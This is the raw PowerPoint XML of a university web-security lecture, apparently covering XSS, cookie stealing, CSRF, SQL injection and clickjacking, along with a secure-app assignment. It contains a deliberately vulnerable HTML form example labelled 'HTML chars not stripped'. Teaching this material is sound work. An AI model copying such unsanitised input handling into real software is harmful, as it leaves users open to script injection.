            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Develop a web/mobile app with the following functionalities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>User Registration page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>User login page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Course information page with grades</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>The app must adhere to CIA:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users can access only their information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Admin can have access to all users (at least 10 users) and can perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>CRUD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>.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4938291"/>
            <a:ext cx="856895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6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800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kern="0" dirty="0" smtClean="0"/>
              <a:t>Java EE/Apache tomcat (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prefer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0" smtClean="0"/>
              <a:t>Android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prefer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern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kern="0" dirty="0" smtClean="0"/>
              <a:t>PHP and MySQL </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39996646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kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="169A48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="169A48"/>
              </a:solidFill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sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>works.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In the next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>two weeks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>we would start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="169A48"/>
                </a:solidFill>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>CRYPTOGRAPY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="169A48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04735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Picture 2" descr="Screen Shot 2012-07-02 at 3.36.17 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2978280" y="1463760"/>
            <a:ext cx="3187440" cy="1434600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="Snip Single Corner Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3579840"/>
            <a:ext cx="7314840" cy="2210760"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
              <a:alpha val="66000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="414242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Consolas"/>
              </a:rPr>
              <a:t>&lt;form name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>XSS" action="#" method="GET”&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;p&gt;What's your name?&lt;/p&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="text" name="name"&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="submit" value="Submit"&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;pre&gt;&gt;Hello David&lt;&lt;/pre&gt;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58" name="Straight Arrow Connector 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2899080"/>
            <a:ext cx="360" cy="680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headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"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9" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133720" y="5448240"/>
            <a:ext cx="1828440" cy="228240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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660" name="Rounded Rectangular Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455080" y="5692680"/>
            <a:ext cx="3200040" cy="799920"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97864"/>
              <a:gd name="adj2" fmla="val -49545"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009446"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="006D33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spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>HTML chars not stripped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0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报告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BRKNBAR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KNBAR 1">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="CC0000"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFFFFF"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="FF0033"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="996633"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="E2AAAA"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FFAAAD"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="8A5C2D"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="CC9900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KNBAR 2">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="0000FF"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFFFFF"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="FF00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AAFF"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="E70000"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="00FF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KNBAR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DDDDDD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97979"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="39393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答辩模板(EN).potx" id="{47EC562F-A56C-44BD-BF4F-A7178AFF4162}" vid="{C18FC2E0-C20E-472D-A3CA-4FCDC14B4C9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2020答辩模板(EN)</Template>
  <TotalTime>21387</TotalTime>
  <Words>3813</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>718</Paragraphs>
  <Slides>87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105" baseType="lpstr">
      <vt:lpstr>ＭＳ ゴシック</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>StarSymbol</vt:lpstr>
      <vt:lpstr>Zapf Dingbats</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>隶书</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Bernard MT Condensed</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>2015报告</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Content</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Basic Browser Model</vt:lpstr>
      <vt:lpstr>Document Object Model</vt:lpstr>
      <vt:lpstr>Document Object Model</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lacing JavaScript</vt:lpstr>
      <vt:lpstr>Lacing JavaScript</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Form Authentication &amp; Cookies</vt:lpstr>
      <vt:lpstr>Sessions using cookies</vt:lpstr>
      <vt:lpstr>Stealing Your Own Cookie</vt:lpstr>
      <vt:lpstr>Example of Cookie Grabber</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>“Reflected” XSS</vt:lpstr>
      <vt:lpstr>“Reflected” XSS</vt:lpstr>
      <vt:lpstr>“Reflected” XSS</vt:lpstr>
      <vt:lpstr>Reflected Example</vt:lpstr>
      <vt:lpstr>Stealing Cookies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>“Stored” XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Content</vt:lpstr>
      <vt:lpstr>Injection Attacks</vt:lpstr>
      <vt:lpstr>Sanitizing Is Not Easy</vt:lpstr>
      <vt:lpstr>“Frontier Sanitization”</vt:lpstr>
      <vt:lpstr>Second-Order SQL Injection</vt:lpstr>
      <vt:lpstr>Context-Specific Sanitization</vt:lpstr>
      <vt:lpstr>Content</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Now lets see what CSRF is?</vt:lpstr>
      <vt:lpstr>Another Example: Home Router</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Referrer Validation</vt:lpstr>
      <vt:lpstr>From HW2: The CRIME Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CSS History Probing</vt:lpstr>
      <vt:lpstr>How does the “Like” button work?</vt:lpstr>
      <vt:lpstr>How does the “Like” button work?</vt:lpstr>
      <vt:lpstr>IFrames</vt:lpstr>
      <vt:lpstr>IFrames</vt:lpstr>
      <vt:lpstr>How does the “Like” button work?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking </vt:lpstr>
      <vt:lpstr>Clickjacking </vt:lpstr>
      <vt:lpstr>Advanced Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking - Mitigation</vt:lpstr>
      <vt:lpstr>Using Frames for Evil</vt:lpstr>
      <vt:lpstr>Framebusting</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Framebusting is Complicated</vt:lpstr>
      <vt:lpstr>Framebusting is Complicated</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Content</vt:lpstr>
      <vt:lpstr>Multi-Party Web Applications</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Multi-Party E-Commerce Applications</vt:lpstr>
      <vt:lpstr>Multi-Party E-Commerce Applications</vt:lpstr>
      <vt:lpstr>Multi-Party E-Commerce Applications</vt:lpstr>
      <vt:lpstr>Multi-Party E-Commerce Applications</vt:lpstr>
      <vt:lpstr>Single Sign-On: OAuth</vt:lpstr>
      <vt:lpstr>Single Sign-On: OAuth</vt:lpstr>
      <vt:lpstr>Content</vt:lpstr>
      <vt:lpstr>Web Security Issues</vt:lpstr>
      <vt:lpstr>Malicious websites</vt:lpstr>
      <vt:lpstr>Malicious websites</vt:lpstr>
      <vt:lpstr>SPAM</vt:lpstr>
      <vt:lpstr>419 Nigerian Scams</vt:lpstr>
      <vt:lpstr>419 Nigerian Scams</vt:lpstr>
      <vt:lpstr>419 Nigerian Scams</vt:lpstr>
      <vt:lpstr>Content</vt:lpstr>
      <vt:lpstr>Continue assignment…</vt:lpstr>
      <vt:lpstr>Next…</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>CNDS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Adjeisah</dc:creator>
  <cp:lastModifiedBy>Adjeisah Michael</cp:lastModifiedBy>
  <cp:revision>1288</cp:revision>
  <cp:lastPrinted>2003-08-26T19:30:50Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2003-06-16T20:07:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-17T07:22:53Z</dcterms:modified>
</cp:coreProperties>
</file>